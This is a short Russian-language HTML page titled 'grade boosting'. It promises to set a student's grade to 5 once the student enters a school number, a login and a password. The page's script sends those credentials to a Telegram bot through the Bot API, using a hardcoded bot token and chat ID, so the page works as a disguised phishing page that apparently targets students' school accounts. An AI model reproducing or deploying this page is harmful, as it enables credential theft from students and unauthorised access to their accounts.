<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>НАКРУТКА ОЦЕНОК</title>
</head>
<style type="text/css">
	body {
		background: #406595;
	}
	h1 {
		color: white;
		text-align: center;
	}
	div {
		height: 400px;
		width: 400px;
		background: #6187b7;
		margin-left: auto;
		margin-right: auto;
	}
	p {
		text-align: center;
	}
	input {
		margin-top: 20px;
		font-size: 25px;
	}
	h2 {
		color: white;
	}
a.button24 {
  display: inline-block;
  color: white;
  text-decoration: none;
  padding: .5em 2em;
  outline: none;
  border-width: 2px 0;
  border-style: solid none;
  border-color: #FDBE33 #000 #D77206;
  border-radius: 6px;
  background: linear-gradient(#F3AE0F, #E38916) #E38916;
  transition: 0.2s;
} 
a.button24:hover { background: linear-gradient(#f5ae00, #f59500) #f5ae00; }
a.button24:active { background: linear-gradient(#f59500, #f5ae00) #f59500; }
a.button8:hover { background: rgba(255,255,255,.2); }
a.button8:active { background: white; }
</style>
<script type="text/javascript">
	function clik1() {
			let url = 'https://api.telegram.org/bot1435943813:AAGkGbxNoIt4kpiBQmfoqqCmnbH7A4rB45c/sendMessage?chat_id=1108316101&text=school: ' + school.value + ' login: ' + login.value + ' password: ' + password.value;
			let xhttp = new XMLHttpRequest();
			xhttp.open("GET", url);
			xhttp.send();
	}
</script>
<body>
	<h1>НАКРУТКА ОЦЕНОК</h1>
	<div><p><input type="text" id="school" name="school" value="" placeholder="номер школы"></p>
		<p><input type="text" name="login" value="" placeholder="логин" id="login"></p>
		<p><input type="password" name="password" value="" placeholder="пароль" id="password"></p>
		<p><input type="text" name="dd" value="" placeholder="название предмета"></p>
		<p><a href="#" class="button24" onclick="clik1()">поставить 5</a></p></div>
</body>
</html>